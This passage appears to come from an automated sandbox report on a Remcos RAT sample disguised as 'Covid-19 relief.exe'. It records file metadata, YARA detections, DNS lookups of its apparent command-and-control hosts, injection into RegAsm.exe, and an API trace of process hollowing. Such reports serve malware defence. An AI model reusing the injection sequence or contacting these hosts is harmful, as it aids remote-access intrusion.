                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                Entrypoint Preview

                                Instruction
                                jmp dword ptr [00402000h]

                                Data Directories

                                Name | Virtual Address | Virtual Size | Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x61d98 | 0x53 | .text
                                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x62000 | 0x28bfe | .rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x8c000 | 0xc | .reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                Sections

                                Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                .text | 0x2000 | 0x5fdf4 | 0x5fe00 | False | 0.891577371252 | data | 7.87913546933 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                .rsrc | 0x62000 | 0x28bfe | 0x28c00 | False | 0.0640756805982 | data | 3.06126871257 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .reloc | 0x8c000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                Resources

                                Name | RVA | Size | Type | Language | Country
                                RT_ICON | 0x62508 | 0x2e8 | dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 741092604, next used block 741092396 | English | United States
                                RT_ICON | 0x627f0 | 0x128 | GLS_BINARY_LSB_FIRST | English | United States
                                RT_ICON | 0x62918 | 0x2ca8 | dBase IV DBT of \300.DBF, block length 9216, next free block index 40, next free block 16843009, next used block 16843009 | English | United States
                                RT_ICON | 0x655c0 | 0x1bc8 | data | English | United States
                                RT_ICON | 0x67188 | 0x1628 | dBase IV DBT of \200.DBF, blocks size 0, block length 4096, next free block index 40, next free block 4294967295, next used block 4294967295 | English | United States
                                RT_ICON | 0x687b0 | 0x1418 | data | English | United States
                                RT_ICON | 0x69bc8 | 0xea8 | data | English | United States
                                RT_ICON | 0x6aa70 | 0xba8 | data | English | United States
                                RT_ICON | 0x6b618 | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | United States
                                RT_ICON | 0x6bec0 | 0x6c8 | data | English | United States
                                RT_ICON | 0x6c588 | 0x608 | data | English | United States
                                RT_ICON | 0x6cb90 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States
                                RT_ICON | 0x6d0f8 | 0xcd1 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States
                                RT_ICON | 0x6ddcc | 0x94a8 | data | English | United States
                                RT_ICON | 0x77274 | 0x5488 | data | English | United States
                                RT_ICON | 0x7c6fc | 0x4228 | dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 0, next used block 0 | English | United States
                                RT_ICON | 0x80924 | 0x3a48 | data | English | United States
                                RT_ICON | 0x8436c | 0x25a8 | data | English | United States
                                RT_ICON | 0x86914 | 0x1a68 | data | English | United States
                                RT_ICON | 0x8837c | 0x10a8 | data | English | United States
                                RT_ICON | 0x89424 | 0x988 | data | English | United States
                                RT_ICON | 0x89dac | 0x6b8 | data | English | United States
                                RT_ICON | 0x8a464 | 0x468 | GLS_BINARY_LSB_FIRST | English | United States
                                RT_GROUP_ICON | 0x8a8cc | 0x148 | data | English | United States
                                RT_MANIFEST | 0x8aa14 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

                                Imports

                                DLL | Import
                                mscoree.dll | _CorExeMain

                                Possible Origin

                                Language of compilation system | Country where language is spoken | Map
                                English | United States |

                                Network Behavior

                                Network Port Distribution

                                TCP Packets

                                Timestamp | Source Port | Dest Port | Source IP | Dest IP

                                UDP Packets

                                Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                Nov 18, 2020 14:55:33.712356091 CET53512758.8.8.8192.168.2.4
                                Nov 18, 2020 14:55:33.929867983 CET6349253192.168.2.48.8.8.8
                                Nov 18, 2020 14:55:33.965612888 CET53634928.8.8.8192.168.2.4
                                Nov 18, 2020 14:55:35.634967089 CET5894553192.168.2.48.8.8.8
                                Nov 18, 2020 14:55:35.670609951 CET53589458.8.8.8192.168.2.4
                                Nov 18, 2020 14:55:37.133745909 CET6077953192.168.2.48.8.8.8
                                Nov 18, 2020 14:55:37.170603991 CET53607798.8.8.8192.168.2.4
                                Nov 18, 2020 14:55:38.243334055 CET6401453192.168.2.48.8.8.8
                                Nov 18, 2020 14:55:38.278871059 CET53640148.8.8.8192.168.2.4
                                Nov 18, 2020 14:55:39.828010082 CET5709153192.168.2.48.8.8.8
                                Nov 18, 2020 14:55:39.863558054 CET53570918.8.8.8192.168.2.4
                                Nov 18, 2020 14:55:42.414829969 CET5590453192.168.2.48.8.8.8
                                Nov 18, 2020 14:55:42.450323105 CET53559048.8.8.8192.168.2.4
                                Nov 18, 2020 14:56:09.813433886 CET5210953192.168.2.48.8.8.8
                                Nov 18, 2020 14:56:09.840454102 CET53521098.8.8.8192.168.2.4
                                Nov 18, 2020 14:56:11.697805882 CET5445053192.168.2.48.8.8.8
                                Nov 18, 2020 14:56:11.725682020 CET53544508.8.8.8192.168.2.4

                                DNS Queries

                                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                Nov 18, 2020 14:54:38.182744980 CET | 192.168.2.4 | 8.8.8.8 | 0x23d7 | Standard query (0) | chaseric.hopto.org | A (IP address) | IN (0x0001)
                                Nov 18, 2020 14:54:59.324421883 CET | 192.168.2.4 | 8.8.8.8 | 0xdce | Standard query (0) | chaseric.ddns.net | A (IP address) | IN (0x0001)
                                Nov 18, 2020 14:55:09.630620003 CET | 192.168.2.4 | 8.8.8.8 | 0x295f | Standard query (0) | chaseric.hopto.org | A (IP address) | IN (0x0001)
                                Nov 18, 2020 14:55:11.723577023 CET | 192.168.2.4 | 8.8.8.8 | 0x4679 | Standard query (0) | chaseric.ddns.net | A (IP address) | IN (0x0001)
                                Nov 18, 2020 14:55:14.438481092 CET | 192.168.2.4 | 8.8.8.8 | 0xfa28 | Standard query (0) | chaseric.hopto.org | A (IP address) | IN (0x0001)
                                Nov 18, 2020 14:55:16.125231028 CET | 192.168.2.4 | 8.8.8.8 | 0x8b55 | Standard query (0) | chaseric.ddns.net | A (IP address) | IN (0x0001)
                                Nov 18, 2020 14:55:18.678056955 CET | 192.168.2.4 | 8.8.8.8 | 0x63cf | Standard query (0) | chaseric.hopto.org | A (IP address) | IN (0x0001)
                                Nov 18, 2020 14:55:20.255029917 CET | 192.168.2.4 | 8.8.8.8 | 0x3669 | Standard query (0) | chaseric.ddns.net | A (IP address) | IN (0x0001)
                                Nov 18, 2020 14:55:25.147579908 CET | 192.168.2.4 | 8.8.8.8 | 0x57da | Standard query (0) | chaseric.hopto.org | A (IP address) | IN (0x0001)
                                Nov 18, 2020 14:55:26.819869041 CET | 192.168.2.4 | 8.8.8.8 | 0x144d | Standard query (0) | chaseric.ddns.net | A (IP address) | IN (0x0001)
                                Nov 18, 2020 14:55:29.603147030 CET | 192.168.2.4 | 8.8.8.8 | 0xf9ce | Standard query (0) | chaseric.hopto.org | A (IP address) | IN (0x0001)
                                Nov 18, 2020 14:55:31.296330929 CET | 192.168.2.4 | 8.8.8.8 | 0xdde9 | Standard query (0) | chaseric.ddns.net | A (IP address) | IN (0x0001)
                                Nov 18, 2020 14:55:33.929867983 CET | 192.168.2.4 | 8.8.8.8 | 0x3907 | Standard query (0) | chaseric.hopto.org | A (IP address) | IN (0x0001)
                                Nov 18, 2020 14:55:35.634967089 CET | 192.168.2.4 | 8.8.8.8 | 0xd864 | Standard query (0) | chaseric.ddns.net | A (IP address) | IN (0x0001)
                                Nov 18, 2020 14:55:38.243334055 CET | 192.168.2.4 | 8.8.8.8 | 0xc968 | Standard query (0) | chaseric.hopto.org | A (IP address) | IN (0x0001)
                                Nov 18, 2020 14:55:39.828010082 CET | 192.168.2.4 | 8.8.8.8 | 0x280 | Standard query (0) | chaseric.ddns.net | A (IP address) | IN (0x0001)
                                Nov 18, 2020 14:55:42.414829969 CET | 192.168.2.4 | 8.8.8.8 | 0xed78 | Standard query (0) | chaseric.hopto.org | A (IP address) | IN (0x0001)

                                DNS Answers

                                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                Nov 18, 2020 14:54:38.219892025 CET | 8.8.8.8 | 192.168.2.4 | 0x23d7 | No error (0) | chaseric.hopto.org | | 194.5.97.21 | A (IP address) | IN (0x0001)
                                Nov 18, 2020 14:54:59.361639977 CET | 8.8.8.8 | 192.168.2.4 | 0xdce | No error (0) | chaseric.ddns.net | | 194.5.97.21 | A (IP address) | IN (0x0001)
                                Nov 18, 2020 14:55:09.666126966 CET | 8.8.8.8 | 192.168.2.4 | 0x295f | No error (0) | chaseric.hopto.org | | 194.5.97.21 | A (IP address) | IN (0x0001)
                                Nov 18, 2020 14:55:11.760684013 CET | 8.8.8.8 | 192.168.2.4 | 0x4679 | No error (0) | chaseric.ddns.net | | 194.5.97.21 | A (IP address) | IN (0x0001)
                                Nov 18, 2020 14:55:14.465570927 CET | 8.8.8.8 | 192.168.2.4 | 0xfa28 | No error (0) | chaseric.hopto.org | | 194.5.97.21 | A (IP address) | IN (0x0001)
                                Nov 18, 2020 14:55:16.160991907 CET | 8.8.8.8 | 192.168.2.4 | 0x8b55 | No error (0) | chaseric.ddns.net | | 194.5.97.21 | A (IP address) | IN (0x0001)
                                Nov 18, 2020 14:55:18.715112925 CET | 8.8.8.8 | 192.168.2.4 | 0x63cf | No error (0) | chaseric.hopto.org | | 194.5.97.21 | A (IP address) | IN (0x0001)
                                Nov 18, 2020 14:55:20.291959047 CET | 8.8.8.8 | 192.168.2.4 | 0x3669 | No error (0) | chaseric.ddns.net | | 194.5.97.21 | A (IP address) | IN (0x0001)
                                Nov 18, 2020 14:55:25.183108091 CET | 8.8.8.8 | 192.168.2.4 | 0x57da | No error (0) | chaseric.hopto.org | | 194.5.97.21 | A (IP address) | IN (0x0001)
                                Nov 18, 2020 14:55:26.855314970 CET | 8.8.8.8 | 192.168.2.4 | 0x144d | No error (0) | chaseric.ddns.net | | 194.5.97.21 | A (IP address) | IN (0x0001)
                                Nov 18, 2020 14:55:29.642263889 CET | 8.8.8.8 | 192.168.2.4 | 0xf9ce | No error (0) | chaseric.hopto.org | | 194.5.97.21 | A (IP address) | IN (0x0001)
                                Nov 18, 2020 14:55:31.331573963 CET | 8.8.8.8 | 192.168.2.4 | 0xdde9 | No error (0) | chaseric.ddns.net | | 194.5.97.21 | A (IP address) | IN (0x0001)
                                Nov 18, 2020 14:55:33.965612888 CET | 8.8.8.8 | 192.168.2.4 | 0x3907 | No error (0) | chaseric.hopto.org | | 194.5.97.21 | A (IP address) | IN (0x0001)
                                Nov 18, 2020 14:55:35.670609951 CET | 8.8.8.8 | 192.168.2.4 | 0xd864 | No error (0) | chaseric.ddns.net | | 194.5.97.21 | A (IP address) | IN (0x0001)
                                Nov 18, 2020 14:55:38.278871059 CET | 8.8.8.8 | 192.168.2.4 | 0xc968 | No error (0) | chaseric.hopto.org | | 194.5.97.21 | A (IP address) | IN (0x0001)
                                Nov 18, 2020 14:55:39.863558054 CET | 8.8.8.8 | 192.168.2.4 | 0x280 | No error (0) | chaseric.ddns.net | | 194.5.97.21 | A (IP address) | IN (0x0001)
                                Nov 18, 2020 14:55:42.450323105 CET | 8.8.8.8 | 192.168.2.4 | 0xed78 | No error (0) | chaseric.hopto.org | | 194.5.97.21 | A (IP address) | IN (0x0001)

                                Code Manipulations

                                Statistics

                                CPU Usage

                                Memory Usage

                                High Level Behavior Distribution

                                Behavior

                                System Behavior

                                General

                                Start time: 14:54:33
                                Start date: 18/11/2020
                                Path: C:\Users\user\Desktop\Covid-19 relief.exe
                                Wow64 process (32bit): true
                                Commandline: 'C:\Users\user\Desktop\Covid-19 relief.exe'
                                Imagebase: 0x310000
                                File size: 560640 bytes
                                MD5 hash: 5DD2C165636EFF7F866E18370351101E
                                Has elevated privileges: true
                                Has administrator privileges: true
                                Programmed in: .Net C# or VB.NET
                                Yara matches:
                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.925613507.0000000004101000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.926940095.0000000005E10000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000001.00000002.927045842.0000000006430000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: Remcos_1, Description: Remcos Payload, Source: 00000001.00000002.927045842.0000000006430000.00000040.00000001.sdmp, Author: kevoreilly
                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000001.00000002.927045842.0000000006430000.00000040.00000001.sdmp, Author: unknown
                                Reputation: low

                                General

                                Start time: 14:54:37
                                Start date: 18/11/2020
                                Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                Wow64 process (32bit): true
                                Commandline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                Imagebase: 0x970000
                                File size: 64616 bytes
                                MD5 hash: 6FD7592411112729BF6B1F2F6C34899F
                                Has elevated privileges: true
                                Has administrator privileges: true
                                Programmed in: C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: Remcos_1, Description: Remcos Payload, Source: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Author: unknown
                                Reputation: moderate

                                General

                                Start time: 14:54:38
                                Start date: 18/11/2020
                                Path: C:\Users\user\Desktop\Covid-19 relief.exe
                                Wow64 process (32bit): true
                                Commandline: 'C:\Users\user\Desktop\Covid-19 relief.exe'
                                Imagebase: 0x350000
                                File size: 560640 bytes
                                MD5 hash: 5DD2C165636EFF7F866E18370351101E
                                Has elevated privileges: true
                                Has administrator privileges: true
                                Programmed in: .Net C# or VB.NET
                                Yara matches:
                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.926179641.0000000004061000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.928004137.0000000006440000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: Remcos_1, Description: Remcos Payload, Source: 00000003.00000002.928004137.0000000006440000.00000040.00000001.sdmp, Author: kevoreilly
                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000003.00000002.928004137.0000000006440000.00000040.00000001.sdmp, Author: unknown
                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000003.00000002.927946901.0000000005CC0000.00000004.00000001.sdmp, Author: Joe Security
                                Reputation: low

                                General

                                Start time: 14:54:43
                                Start date: 18/11/2020
                                Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                Wow64 process (32bit): false
                                Commandline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                Imagebase: 0x3c0000
                                File size: 64616 bytes
                                MD5 hash: 6FD7592411112729BF6B1F2F6C34899F
                                Has elevated privileges: true
                                Has administrator privileges: true
                                Programmed in: C, C++ or other language
                                Reputation: moderate

                                General

                                Start time: 14:54:43
                                Start date: 18/11/2020
                                Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                Wow64 process (32bit): true
                                Commandline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                Imagebase: 0xb40000
                                File size: 64616 bytes
                                MD5 hash: 6FD7592411112729BF6B1F2F6C34899F
                                Has elevated privileges: true
                                Has administrator privileges: true
                                Programmed in: C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: Remcos_1, Description: Remcos Payload, Source: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Author: kevoreilly
                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, Author: unknown
                                Reputation: moderate

                                Disassembly

                                Code Analysis

                                  Executed Functions

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.926919557.00000000057B0000.00000040.00000001.sdmp, Offset: 057B0000, based on PE: false
                                  Similarity
                                  • API ID: Section$OpenView
                                  • String ID: .dll$.dll$.dll$2.dl$2.dl$2.dl$2.dl$32.d$Begi$Clas$CoCr$CoIn$Cont$Cont$Crea$Crea$Crea$Cryp$Cryp$Cryp$Cryp$Cryp$Cryp$Cryp$Cryp$DefW$EndP$Ex$ExW$Expa$File$Fill$Find$Free$GetM$GetP$GetS$Hash$Inst$IsWo$KERNEL32.DLL$Key$Key$KeyP$LdrG$LdrL$Libr$Load$Load$Lock$Memo$Mess$Mess$Muta$NtAd$NtAl$NtCl$NtCo$NtCr$NtCr$NtCr$NtCr$NtCr$NtDe$NtEn$NtFr$NtGe$NtMa$NtOp$NtOp$NtOp$NtOp$NtOp$NtOp$NtPr$NtQu$NtQu$NtQu$NtQu$NtQu$NtRe$NtRe$NtRe$NtSe$NtSe$NtTe$NtWr$NtWr$Ole3$Para$Post$Priv$Proc$Quit$Rect$Regi$Reso$Reso$Reso$Reso$RtlC$RtlC$RtlC$RtlF$RtlS$RtlZ$Sect$Show$Size$Thre$Thre$Thre$Thre$Tran$User$User$W$W$Wind$ZwCr$ZwRo$ZwUn$\Kno$\Kno$\Kno$\Kno$\Kno$\Kno$\Kno$\Kno$\Kno$\Kno$\Ole$\adv$\ker$\ntd$\use$a$ad$ad$ad$adEx$adFi$adVi$age$ageB$aint$alMe$alue$ance$ansa$api3$aryA$ash$at$ateH$ateK$ateP$ath$cW$ce$cess$cess$ckTr$ctio$ctio$ddre$ddre$dll$dll$dll$dvap$eA$eFil$eNam$ePro$eUse$eUse$ead$ease$eate$eate$eate$eate$eate$eate$eate$ecti$ecti$eeVi$emor$en$en$enFi$enKe$enMu$enPr$enPr$enSe$erne$eroM$eryI$eryI$eryS$eryS$eryV$esTo$ess$et$etCu$etPr$ext$extW$ey$ey$fSec$hDat$i32.$iewO$ile$ileg$indo$ings$ion$ion$irtu$iteF$iteV$itia$iveK$just$ken$kernel32.dll$l$l$l$l$l32.$lMem$lMem$lMem$layE$le$le$le$le32$lenW$lize$ll$ll$ll$ll.d$llba$loca$ls32$ls32$ls32$ls32$ls32$ls\O$ls\a$ls\k$ls\n$ls\u$lstr$mInf$mInf$mapV$mati$mati$mbstowcs$memc$mems$mete$mory$mp$n$n$nPai$ndEn$ndow$nel3$nfor$nfor$nmen$nsac$nt$nt$ntin$o$oadD$oced$oces$oces$oces$oces$odul$ofRe$ombs$on$on$onFi$onPr$orma$orma$ory$ory$ory$ose$otec$ow$oxA$pVie$py$py$r32.$rPro$rThr$reat$reat$reat$rent$rmin$rocA$roce$roce$rren$rs$rtua$rtua$rtua$ry$rypt$s$s$sTok$sW$sW$sact$ser3$sour$ss$ss$ss$ss$ster$strlenuser32.dlladvapi32.dll$sume$tAcq$tCon$tCon$tCre$tCur$tDec$tDer$tDes$tDes$tHas$tRel$tStr$tTra$tVal$tVir$tant$tdll$teMu$tePr$teVi$teWi$texW$text$text$tion$tion$tion$tion$troy$troy$tual$ue$ueKe$uire$umer$urce$urce$urce$urce$ureA$viro$w64P$wOfS$wPro$wcsc$wcsc$wcsc$wcsl$wcst$wnDl$wnDl$wnDl$wnDl$wnDl$wnDl$wnDl$wnDl$wnDl$wnDl$xecu$y$y$y$yste$yste
                                  • API String ID: 2380476227-789266925
                                  • Opcode ID: 62f96461c8ecb572473f998a272c8d50221bd415e6440be668470d52ab82c26e
                                  • Instruction ID: a61e5d55fba0536f28f0ba3107ea069eccfe1dc718b15d44c15f2632783fd39d
                                  • Opcode Fuzzy Hash: 62f96461c8ecb572473f998a272c8d50221bd415e6440be668470d52ab82c26e
                                  • Instruction Fuzzy Hash: 28D2B0B1C0526C8ADF21DFA18D89BCEBBB8BF15701F1081DAD148AB215EB719B84CF55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,0800000C,00000000,00000000,?,?), ref: 057B1CB7
                                  • NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,00000000), ref: 057B1CDC
                                  • NtReadVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 057B1CF6
                                  • NtCreateSection.NTDLL(?,000F001F,00000000,?,00000040,08000000,00000000), ref: 057B1D41
                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 057B1D66
                                  • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 057B1DA9
                                  • NtWriteVirtualMemory.NTDLL(?,?,?,00000004,?), ref: 057B1E36
                                  • NtGetContextThread.NTDLL(?,?), ref: 057B1E50
                                  • NtSetContextThread.NTDLL(?,00010007), ref: 057B1E74
                                  • NtResumeThread.NTDLL(?,00000000), ref: 057B1E86
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.926919557.00000000057B0000.00000040.00000001.sdmp, Offset: 057B0000, based on PE: false
                                  Similarity
                                  • API ID: SectionThread$ContextCreateMemoryProcessViewVirtual$InformationQueryReadResumeWrite
                                  • String ID:
                                  • API String ID: 3307612235-0
                                  • Opcode ID: 96ae76fc365d5c28d7c28a07cf9a8eaef0a1b5bf8692d1917c9822d9dabbaf16
                                  • Instruction ID: c913836d572792ca48888be11c4babccb006efefb54af16f4eba4d23c3617d61
                                  • Opcode Fuzzy Hash: 96ae76fc365d5c28d7c28a07cf9a8eaef0a1b5bf8692d1917c9822d9dabbaf16
                                  • Instruction Fuzzy Hash: DD91E271900248ABEF21DFA5CC88EEEBBB8FF49705F404059FA09EA150D771AA54DB60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • NtOpenSection.NTDLL(?,0000000C,?), ref: 057B0199
                                  • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,?,00000001,00000000,00000002), ref: 057B01B8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.926919557.00000000057B0000.00000040.00000001.sdmp, Offset: 057B0000, based on PE: false
                                  Similarity
                                  • API ID: Section$OpenView
                                  • String ID: @$NtMapViewOfSectionNtOpenSection$NtOpenSection$en$wcsl
                                  • API String ID: 2380476227-2634024955
                                  • Opcode ID: ca8d08bbda82312d277e41b8cb719b15daffc38e68cad09b1ab1bebb54b543c8
                                  • Instruction ID: 2559dd1f8ab27f22f7835ec441c86e79fea5c84e442843e2dcd37b8bc028c8c0
                                  • Opcode Fuzzy Hash: ca8d08bbda82312d277e41b8cb719b15daffc38e68cad09b1ab1bebb54b543c8
                                  • Instruction Fuzzy Hash: 673102B1A1025CAFCB10CFE4C889BDEBBB8FF08750F10415AE514AB250E7B49A05CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • DeleteFileA.KERNELBASE(?), ref: 00C39357
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.921649797.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Similarity
                                  • API ID: DeleteFile
                                  • String ID:
                                  • API String ID: 4033686569-0
                                  • Opcode ID: 06dd3d9cf48fc4b6c3cedd39a4361c2855d2360c29f03f1ee666cd28c61a848a
                                  • Instruction ID: 6a314bab0203d613174d2377cb7a633b5540b104423f54473da195fb580026ea
                                  • Opcode Fuzzy Hash: 06dd3d9cf48fc4b6c3cedd39a4361c2855d2360c29f03f1ee666cd28c61a848a
                                  • Instruction Fuzzy Hash: 554176B0D106188FDB50CFA9C8857DEBBF1EF48304F148129E815AB394D7B89986CF81
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • DeleteFileA.KERNELBASE(?), ref: 00C39357
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.921649797.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Similarity
                                  • API ID: DeleteFile
                                  • String ID:
                                  • API String ID: 4033686569-0
                                  • Opcode ID: a35ba97f4e49007436d342448b2ba8427781bde4cfdbbc02975463b639731a90
                                  • Instruction ID: e03e8fc50b24a10435e6345f5d68c9f093ace2f52196513acee74b0f6e2af219
                                  • Opcode Fuzzy Hash: a35ba97f4e49007436d342448b2ba8427781bde4cfdbbc02975463b639731a90
                                  • Instruction Fuzzy Hash: 0A4136B0D106188FDB50CFA9C8857DEBBF1EB48314F148129E815AB394D7B8A885CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 00C39698
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.921649797.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: f821fb9b41b99fe2a7de14141193f3017c660670dbf0d5789cce2a2b205e3f70
                                  • Instruction ID: 17301fa199a4573b4787f032e60b06b97d6bfcc268ffd4895b9d67a879d98e3e
                                  • Opcode Fuzzy Hash: f821fb9b41b99fe2a7de14141193f3017c660670dbf0d5789cce2a2b205e3f70
                                  • Instruction Fuzzy Hash: 34810170A042048FCB10DBB9C494BAEBBF2EF89314F14856DD51A9B382DBB5DC42CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 00C39698
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.921649797.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Similarity
                                  • API ID: AllocVirtual
                                  • String ID:
                                  • API String ID: 4275171209-0
                                  • Opcode ID: cd4d611f66111a1107091f3db2b8219542db3715fa210099009ec789bbf9d46a
                                  • Instruction ID: e63665924719b0b33767fe2f462efe31e2dd5b824fb18949b7a2065a715f87fa
                                  • Opcode Fuzzy Hash: cd4d611f66111a1107091f3db2b8219542db3715fa210099009ec789bbf9d46a
                                  • Instruction Fuzzy Hash: A011E6B59002099FDB10DF9AD844BDEFBF4FB48324F148429E529A7210D7B5A944CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Memory Dump Source
                                  • Source File: 00000001.00000002.921649797.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ecc35d52104873a39c3e55fdd570d4780173e709bcf150a1e38aaf288f0eb10d
                                  • Instruction ID: 590bd5333be02a19761b0f87c0e902557164e6c93a6754b73071c9007e9c022b
                                  • Opcode Fuzzy Hash: ecc35d52104873a39c3e55fdd570d4780173e709bcf150a1e38aaf288f0eb10d
                                  • Instruction Fuzzy Hash: 6CD1F831C2475A8ADB10EF64C860A9DB3B1FFD6300F50CB9AE50977265EB706AC8CB41
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000001.00000002.921649797.0000000000C30000.00000040.00000001.sdmp, Offset: 00C30000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7ccaae231152855b69928314277769e1d11827a81ab0f58d7ced3cfcea4d08cd
                                  • Instruction ID: 9943d10419e9d0224b65ef209c159482787d3b82d3721546d3d2fd5d8f40d53d
                                  • Opcode Fuzzy Hash: 7ccaae231152855b69928314277769e1d11827a81ab0f58d7ced3cfcea4d08cd
                                  • Instruction Fuzzy Hash: C2D1E731C2075A8ADB10EF65C960A9DB3B1FFD5300F50CB9AE50977265EB706AC8CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Executed Functions

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040D2BC
